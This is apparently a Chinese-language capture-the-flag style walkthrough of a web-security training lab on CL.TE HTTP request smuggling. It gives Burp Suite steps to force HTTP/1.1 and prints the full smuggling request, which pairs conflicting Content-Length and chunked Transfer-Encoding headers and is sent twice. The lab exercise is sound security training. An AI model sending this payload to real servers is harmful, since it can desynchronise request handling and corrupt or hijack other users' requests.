Lab: HTTP request smuggling, basic CL.TE vulnerability
目录
Lab: HTTP request smuggling, basic CL.TE vulnerability
0x02.登陆到Lab中,使用BrupSuite找到HTTP历史记录中的浏览记录
1x03 需要修改INSPECTOR中的HTTP协议选项编辑
0x01.查看Lab的注意事项
这点很重要,HTTP/2协议,无法完成本Lab
0x02.登陆到Lab中,使用BrupSuite找到HTTP历史记录中的浏览记录
1x01 找到第一条请求,发送到重发器
1x02 看到当前的HTTP请求协议是 HTTP/2
1x03 需要修改INSPECTOR中的HTTP协议选项
1x04 请求协议修改为 HTTP/1.1
0x03. 将请求修改为payload的内容
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
点击发送两次相同的内容
发送1:
发送2:
ps:中间截图操作时间有点长,Lab自动释放了,导致最后的Host地址和前面的不一样,但是不影响出现结果。Lab10分钟左右不操作就可能会释放。
总结:
想要通过Lab还是很容易的,需要注意以下几点:
1.Lab的注意内容和提示内容,很有可能是没有修改HTTP协议导致无法通过
2.修改HTTP协议的地方,V2022.3.9版本在最右边的侧边栏,其他版本也可以在附近位置找一下
3.一定要将HTTP/2协议,修改为HTTP/1协议